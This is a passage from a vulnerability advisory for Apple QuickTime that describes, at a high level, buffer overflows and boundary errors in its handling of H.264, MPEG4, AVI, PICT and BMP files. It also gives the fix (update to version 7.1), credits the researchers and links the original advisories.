H.264 movies can be exploited via a specially crafted H.264 movie to
crash the application and potentially execute arbitrary code.
5) A boundary error within the processing of MPEG4 movies can be
exploited via a specially crafted MPEG4 movie to crash the
application and potentially execute arbitrary code.
7) A boundary error within the processing of AVI movies can be
exploited via a specially crafted AVI movie to crash the application
and potentially execute arbitrary code.
8) Two boundary errors within the processing of PICT images can be
exploited to cause either a stack-based buffer overflow via a PICT image
with specially crafted font information or a heap-based buffer overflow
via a PICT image with specially crafted image data. This can be
exploited to crash the application and potentially execute arbitrary
code.
9) A boundary error within the processing of BMP images can be
exploited via a specially crafted BMP image to crash the application
and potentially execute arbitrary code.
SOLUTION:
Update to version 7.1.
http://www.apple.com/support/downloads/quicktime71.html
PROVIDED AND/OR DISCOVERED BY:
1) Reported by the vendor.
2) Mike Price of McAfee AVERT Labs and Sowhat of Nevis Labs.
3) Mike Price, McAfee AVERT Labs.
4) Mike Price of McAfee AVERT Labs and ATmaCA.
5) Mike Price, McAfee AVERT Labs.
6) Fang Xing of eEye Digital Security and Mike Price of McAfee AVERT
Labs.
7) Mike Price, McAfee AVERT Labs.
8) Mike Price, McAfee AVERT Labs.
9) Tom Ferris
ORIGINAL ADVISORY:
Apple:
http://docs.info.apple.com/article.html?artnum=303752
eEye Digital Security:
http://www.eeye.com/html/research/advisories/AD20060511.html
Zero Day Initiative:
http://www.zerodayinitiative.com/advisories/ZDI-06-015.html
Sowhat:
http://secway.org/advisory/AD20060512.txt